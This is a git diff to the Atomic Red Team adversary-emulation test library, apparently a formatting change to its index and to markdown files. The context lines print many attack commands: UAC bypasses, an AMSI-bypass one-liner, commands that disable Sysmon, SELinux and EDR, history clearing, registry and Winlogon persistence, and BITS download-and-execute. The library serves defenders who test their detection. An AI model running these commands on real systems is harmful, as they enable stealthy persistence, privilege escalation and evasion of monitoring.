diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md index eab10287ba..78dd810120 100644 --- a/atomics/T1121/T1121.md +++ b/atomics/T1121/T1121.md @@ -28,7 +28,8 @@ Executes the Uninstall Method, No Admin Rights Required #### Attack Commands: Run with `command_prompt`! -``` + +```cmd C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} ``` @@ -71,9 +72,10 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK | source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs| - #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $Content = [System.Convert]::FromBase64String($key) Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md index 3032337d8f..25b95819ab 100644 --- a/atomics/T1158/T1158.md +++ b/atomics/T1158/T1158.md @@ -242,7 +242,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require ```cmd echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} -for /f "usebackq delims=╧å" %i in (#{file_name}:#{ads_filename}) do %i +for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i ``` #### Cleanup Commands: diff --git a/atomics/index.yaml b/atomics/index.yaml index 5ba1ffc9a8..082a26bb86 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -62,7 +62,7 @@ persistence: - name: Add command to .bash_profile description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -75,11 +75,11 @@ persistence: name: sh command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' - name: Add command to .bashrc description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -92,7 +92,7 @@ persistence: name: sh command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' T1015: technique: x_mitre_permissions_required: @@ -170,7 +170,7 @@ persistence: description: 'Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. - ' +' supported_platforms: - windows input_arguments: @@ -178,7 +178,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -186,7 +186,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -303,7 +303,7 @@ persistence: - name: Admin Account Manipulate description: 'Manipulate Admin Account Name - ' +' supported_platforms: - windows executor: @@ -522,7 +522,7 @@ persistence: description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system - ' +' supported_platforms: - windows input_arguments: @@ -535,7 +535,7 @@ persistence: elevation_required: true command: 'reg.exe import #{registry_file} - ' +' T1138: technique: x_mitre_data_sources: @@ -642,7 +642,7 @@ persistence: - name: New shim database files created in the default shim database directory description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - ' +' supported_platforms: - windows executor: @@ -657,7 +657,7 @@ persistence: - name: Registry key creation and/or modification events for SDB description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - ' +' supported_platforms: - windows executor: @@ -772,10 +772,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' - name: Download & Execute via PowerShell BITS description: | This test simulates an adversary leveraging bitsadmin.exe to download @@ -796,10 +796,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' - name: Persist, Download, & Execute description: | This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer @@ -947,7 +947,7 @@ persistence: - name: Firefox description: 'Create a file called test.wma, with the duration of 30 seconds - ' +' supported_platforms: - linux - windows @@ -1033,7 +1033,7 @@ persistence: - name: Change Default File Association description: 'Change Default File Association From cmd.exe - ' +' supported_platforms: - windows input_arguments: @@ -1050,7 +1050,7 @@ persistence: elevation_required: false command: 'cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}" - ' +' T1136: technique: x_mitre_permissions_required: @@ -1123,7 +1123,7 @@ persistence: - name: Create a user account on a Linux system description: 'Create a user via useradd - ' +' supported_platforms: - linux input_arguments: @@ -1140,14 +1140,14 @@ persistence: elevation_required: true command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - ' +' cleanup_command: 'userdel #{username} - ' +' - name: Create a user account on a MacOS system description: 'Creates a user on a MacOS system with dscl - ' +' supported_platforms: - macos input_arguments: @@ -1171,11 +1171,11 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} - ' +' - name: Create a new user in a command prompt description: 'Creates a new user in a command prompt - ' +' supported_platforms: - windows input_arguments: @@ -1192,14 +1192,14 @@ persistence: elevation_required: true command: 'net user /add "#{username}" "#{password}" - ' +' cleanup_command: 'net user /del "#{username}" - ' +' - name: Create a new user in PowerShell description: 'Creates a new user in PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -1212,15 +1212,15 @@ persistence: elevation_required: true command: 'New-LocalUser -Name "#{username}" -NoPassword - ' +' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - ' +' - name: Create a new user in Linux with `root` UID and GID. description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. - ' +' supported_platforms: - linux input_arguments: @@ -1411,7 +1411,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -1583,7 +1583,7 @@ persistence: - name: Create a hidden file in a hidden directory description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -1595,11 +1595,11 @@ persistence: echo "T1158" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' - name: Mac Hidden file description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: @@ -1608,12 +1608,12 @@ persistence: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' - name: Create Windows System File with Attrib description: 'Creates a file and marks it as a system file using the attrib.exe utility. - ' +' supported_platforms: - windows executor: @@ -1624,11 +1624,11 @@ persistence: attrib.exe +s %TEMP%\T1158.txt cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1 - ' +' - name: Create Windows Hidden File with Attrib description: 'Creates a file and marks it as hidden using the attrib.exe utility. - ' +' supported_platforms: - windows executor: @@ -1639,11 +1639,11 @@ persistence: attrib.exe +h %TEMP%\T1158_hidden.txt cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 - ' +' - name: Hidden files description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -1656,11 +1656,11 @@ persistence: elevation_required: false command: 'setfile -a V #{filename} - ' +' - name: Hide a Directory description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -1671,11 +1671,11 @@ persistence: chflags hidden /var/tmp/T1158_mac.txt cleanup_command: 'rm /var/tmp/T1158_mac.txt - ' +' - name: Show all hidden files description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: @@ -1683,15 +1683,15 @@ persistence: elevation_required: false command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' - name: Create ADS command prompt description: 'Create an Alternate Data Stream with the command prompt. Write access is required. - ' +' supported_platforms: - windows input_arguments: @@ -1709,15 +1709,15 @@ persistence: command: | echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} - for /f "usebackq delims=╧å" %i in (#{file_name}:#{ads_filename}) do %i + for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' - name: Create ADS PowerShell description: 'Create an Alternate Data Stream with PowerShell. Write access is required. - ' +' supported_platforms: - windows input_arguments: @@ -1739,7 +1739,7 @@ persistence: ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' T1179: technique: x_mitre_data_sources: @@ -1869,7 +1869,7 @@ persistence: - name: Hook PowerShell TLS Encrypt/Decrypt Messages description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -2067,7 +2067,7 @@ persistence: - name: IFEO Add Debugger description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -2085,15 +2085,15 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f - ' +' - name: IFEO Global Flags description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -2221,7 +2221,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -2238,10 +2238,10 @@ persistence: elevation_required: true command: 'insmod #{kernel_module_file} - ' +' cleanup_command: 'rmmod #{module_name} - ' +' T1159: technique: x_mitre_permissions_required: @@ -2326,7 +2326,7 @@ persistence: - name: Launch Agent description: 'Create a plist and execute it - ' +' supported_platforms: - macos executor: @@ -2428,7 +2428,7 @@ persistence: - name: Launch Daemon description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos executor: @@ -2512,14 +2512,14 @@ persistence: - name: Launchctl description: 'Utilize launchctl - ' +' supported_platforms: - macos executor: name: sh command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator - ' +' T1168: technique: x_mitre_data_sources: @@ -2607,7 +2607,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -2624,13 +2624,13 @@ persistence: name: bash command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} - ' +' - name: Cron - Add script to cron folder description: 'This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -2647,7 +2647,7 @@ persistence: name: bash command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} - ' +' - name: Event Monitor Daemon Persistence description: "This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. \n" @@ -2752,7 +2752,7 @@ persistence: description: 'Adds a registry value to run batch script created in the C:\Windows\Temp directory. - ' +' supported_platforms: - windows input_arguments: @@ -2777,7 +2777,7 @@ persistence: - name: Scheduled Task Startup Script description: 'Run an exe on user logon or system startup - ' +' supported_platforms: - windows executor: @@ -2792,7 +2792,7 @@ persistence: - name: Logon Scripts - Mac description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -2808,7 +2808,7 @@ persistence: description: 'vbs files can be placed in and ran from the startup folder to maintain persistance - ' +' supported_platforms: - windows executor: @@ -2826,7 +2826,7 @@ persistence: description: 'jse files can be placed in and ran from the startup folder to maintain persistance - ' +' supported_platforms: - windows executor: @@ -2844,7 +2844,7 @@ persistence: description: 'bat files can be placed in and ran from the startup folder to maintain persistance - ' +' supported_platforms: - windows executor: @@ -3001,7 +3001,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -3013,7 +3013,7 @@ persistence: name: command_prompt command: 'netsh.exe add helper #{helper_file} - ' +' T1050: technique: x_mitre_permissions_required: @@ -3089,7 +3089,7 @@ persistence: - name: Service Installation description: 'Installs A Local Service - ' +' supported_platforms: - windows input_arguments: @@ -3120,7 +3120,7 @@ persistence: - name: Service Installation PowerShell Installs A Local Service using PowerShell description: 'Installs A Local Service via PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -3424,7 +3424,7 @@ persistence: - name: Plist Modification description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -3517,7 +3517,7 @@ persistence: description: 'Appends a start process cmdlet to the current user''s powershell profile pofile that points to a malicious executable - ' +' supported_platforms: - windows input_arguments: @@ -3598,7 +3598,7 @@ persistence: command: 'echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' T1164: technique: x_mitre_permissions_required: @@ -3767,7 +3767,7 @@ persistence: - name: Reg Key Run description: 'Run Key Persistence - ' +' supported_platforms: - windows input_arguments: @@ -3780,15 +3780,15 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f - ' +' - name: Reg Key RunOnce description: 'RunOnce Key Persistence - ' +' supported_platforms: - windows input_arguments: @@ -3801,15 +3801,15 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f - ' +' - name: PowerShell Registry RunOnce description: 'RunOnce Key Persistence via PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -3830,7 +3830,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' T1053: technique: x_mitre_permissions_required: @@ -3933,7 +3933,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' - name: Scheduled task Local description: '' supported_platforms: @@ -3952,14 +3952,14 @@ persistence: elevation_required: true command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F - ' +' - name: Scheduled task Remote description: 'Create a task on a remote system - ' +' supported_platforms: - windows input_arguments: @@ -3989,10 +3989,10 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F - ' +' - name: Powershell Cmdlet Scheduled Task description: | Create an atomic scheduled task that leverages native powershell cmdlets. @@ -4012,7 +4012,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' T1180: technique: x_mitre_data_sources: @@ -4075,7 +4075,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -4416,7 +4416,7 @@ persistence: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -4442,7 +4442,7 @@ persistence: - name: Set a SetUID flag on file description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -4460,11 +4460,11 @@ persistence: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' - name: Set a SetGID flag on file description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -4482,7 +4482,7 @@ persistence: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' T1023: technique: x_mitre_permissions_required: @@ -4548,11 +4548,11 @@ persistence: command: 'echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1 - ' +' - name: Create shortcut to cmd in startup folders description: 'LNK file to launch CMD placed in startup folder - ' +' supported_platforms: - windows executor: @@ -4648,10 +4648,10 @@ persistence: elevation_required: true command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' T1501: technique: x_mitre_data_sources: @@ -4750,7 +4750,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -4966,10 +4966,10 @@ persistence: name: command_prompt command: 'xcopy #{web_shells} #{web_shell_path} - ' +' cleanup_command: 'del #{web_shell_path} >nul 2>&1 - ' +' T1084: technique: x_mitre_permissions_required: @@ -5138,7 +5138,7 @@ persistence: description: 'PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. - ' +' supported_platforms: - windows input_arguments: @@ -5152,16 +5152,16 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' - name: Winlogon Userinit Key Persistence - PowerShell description: 'PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. - ' +' supported_platforms: - windows input_arguments: @@ -5175,16 +5175,16 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' - name: Winlogon Notify Key Logon Persistence - PowerShell description: 'PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. - ' +' supported_platforms: - windows input_arguments: @@ -5201,7 +5201,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' defense-evasion: T1134: technique: @@ -5516,10 +5516,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' - name: Download & Execute via PowerShell BITS description: | This test simulates an adversary leveraging bitsadmin.exe to download @@ -5540,10 +5540,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' - name: Persist, Download, & Execute description: | This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer @@ -5639,7 +5639,7 @@ defense-evasion: - name: Pad Binary to Change Hash - Linux/macOS dd description: 'Uses dd to add a zero to the binary to change the hash - ' +' supported_platforms: - macos - linux @@ -5653,7 +5653,7 @@ defense-evasion: elevation_required: false command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} - ' +' T1088: technique: x_mitre_data_sources: @@ -5755,7 +5755,7 @@ defense-evasion: description: 'Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - ' +' supported_platforms: - windows input_arguments: @@ -5770,12 +5770,12 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f - ' +' - name: Bypass UAC using Event Viewer - PowerShell description: 'PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - ' +' supported_platforms: - windows input_arguments: @@ -5792,12 +5792,12 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' - name: Bypass UAC using Fodhelper description: 'Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -5814,12 +5814,12 @@ defense-evasion: fodhelper.exe cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f - ' +' - name: Bypass UAC using Fodhelper - PowerShell description: 'PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -5838,12 +5838,12 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' - name: Bypass UAC using ComputerDefaults - PowerShell description: 'PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 - ' +' supported_platforms: - windows input_arguments: @@ -5862,13 +5862,13 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' - name: Bypass UAC by Mocking Trusted Directories description: 'Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems, however the directory structure will be created. - ' +' supported_platforms: - windows input_arguments: @@ -5964,7 +5964,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands - ' +' supported_platforms: - windows input_arguments: @@ -5984,12 +5984,12 @@ defense-evasion: elevation_required: false command: 'cmstp.exe /s #{inf_file_path} - ' +' - name: CMSTP Executing UAC Bypass description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file - ' +' supported_platforms: - windows input_arguments: @@ -6009,7 +6009,7 @@ defense-evasion: elevation_required: false command: 'cmstp.exe /s #{inf_file_uac} /au - ' +' T1146: technique: x_mitre_data_sources: @@ -6062,7 +6062,7 @@ defense-evasion: - name: Clear Bash history (rm) description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos @@ -6070,11 +6070,11 @@ defense-evasion: name: sh command: 'rm ~/.bash_history - ' +' - name: Clear Bash history (echo) description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos @@ -6082,11 +6082,11 @@ defense-evasion: name: sh command: 'echo "" > ~/.bash_history - ' +' - name: Clear Bash history (cat dev/null) description: 'Clears bash history via cat /dev/null - ' +' supported_platforms: - linux - macos @@ -6094,11 +6094,11 @@ defense-evasion: name: sh command: 'cat /dev/null > ~/.bash_history - ' +' - name: Clear Bash history (ln dev/null) description: 'Clears bash history via a symlink to /dev/null - ' +' supported_platforms: - linux - macos @@ -6106,23 +6106,23 @@ defense-evasion: name: sh command: 'ln -sf /dev/null ~/.bash_history - ' +' - name: Clear Bash history (truncate) description: 'Clears bash history via truncate - ' +' supported_platforms: - linux executor: name: sh command: 'truncate -s0 ~/.bash_history - ' +' - name: Clear history of a bunch of shells description: 'Clears the history of a bunch of different shell types by setting the history size to zero - ' +' supported_platforms: - linux - macos @@ -6220,7 +6220,7 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} - ' +' cleanup_command: 'del #{output_file} >nul 2>&1' T1223: technique: @@ -6289,7 +6289,7 @@ defense-evasion: - name: Compiled HTML Help Local Payload description: 'Uses hh.exe to execute a local compiled HTML Help payload. - ' +' supported_platforms: - windows input_arguments: @@ -6309,11 +6309,11 @@ defense-evasion: elevation_required: false command: 'hh.exe #{local_chm_file} - ' +' - name: Compiled HTML Help Remote Payload description: 'Uses hh.exe to execute a remote compiled HTML Help payload. - ' +' supported_platforms: - windows input_arguments: @@ -6326,7 +6326,7 @@ defense-evasion: elevation_required: false command: 'hh.exe #{remote_chm_file} - ' +' T1090: technique: x_mitre_data_sources: @@ -6404,7 +6404,7 @@ defense-evasion: name: sh command: 'export #{proxy_scheme}_proxy=#{proxy_server} - ' +' cleanup_command: | unset http_proxy unset https_proxy @@ -6514,7 +6514,7 @@ defense-evasion: description: 'This test simulates an adversary leveraging control.exe to execute a payload and pops calc - ' +' supported_platforms: - windows input_arguments: @@ -6534,7 +6534,7 @@ defense-evasion: elevation_required: false command: 'control.exe #{cpl_file_path} - ' +' T1207: technique: x_mitre_data_sources: @@ -6791,7 +6791,7 @@ defense-evasion: updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded - ' +' supported_platforms: - windows input_arguments: @@ -6868,7 +6868,7 @@ defense-evasion: - name: Deobfuscate/Decode Files Or Information description: 'Encode/Decode executable - ' +' supported_platforms: - windows input_arguments: @@ -6889,7 +6889,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) - ' +' supported_platforms: - windows input_arguments: @@ -6958,7 +6958,7 @@ defense-evasion: - name: Disable iptables firewall description: 'Disables the iptables firewall - ' +' supported_platforms: - linux executor: @@ -6977,7 +6977,7 @@ defense-evasion: - name: Disable syslog description: 'Disables syslog collection - ' +' supported_platforms: - linux executor: @@ -6994,7 +6994,7 @@ defense-evasion: - name: Disable Cb Response description: 'Disable the Cb Response service - ' +' supported_platforms: - linux executor: @@ -7011,52 +7011,52 @@ defense-evasion: - name: Disable SELinux description: 'Disables SELinux enforcement - ' +' supported_platforms: - linux executor: name: sh command: 'setenforce 0 - ' +' - name: Disable Carbon Black Response description: 'Disables Carbon Black Response - ' +' supported_platforms: - macos executor: name: sh command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist - ' +' - name: Disable LittleSnitch description: 'Disables LittleSnitch - ' +' supported_platforms: - macos executor: name: sh command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' - name: Disable OpenDNS Umbrella description: 'Disables OpenDNS Umbrella - ' +' supported_platforms: - macos executor: name: sh command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' - name: Unload Sysmon Filter Driver description: 'Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. - ' +' supported_platforms: - windows input_arguments: @@ -7075,10 +7075,10 @@ defense-evasion: elevation_required: true prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver} - ' +' command: 'fltmc.exe unload #{sysmon_driver} - ' +' cleanup_command: | sc stop sysmon fltmc.exe load #{sysmon_driver} @@ -7099,19 +7099,19 @@ defense-evasion: prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {exit 0} else {exit 1} - ' +' command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true - ' +' cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false - ' +' - name: Uninstall Sysmon description: 'Uninstall Sysinternals Sysmon for Defense Evasion - ' +' supported_platforms: - windows input_arguments: @@ -7138,10 +7138,10 @@ defense-evasion: elevation_required: true command: 'sysmon -u - ' +' cleanup_command: 'sysmon -i -accepteula - ' +' - name: AMSI Bypass - AMSI InitFailed description: | Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. @@ -7165,16 +7165,16 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse - ' +' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" - ' +' - name: Disable Arbitrary Security Windows Service description: 'With administrative rights, an adversary can disable Windows Services related to security products. - ' +' supported_platforms: - windows input_arguments: @@ -7223,12 +7223,12 @@ defense-evasion: elevation_required: false command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true) - ' +' - name: Tamper with Windows 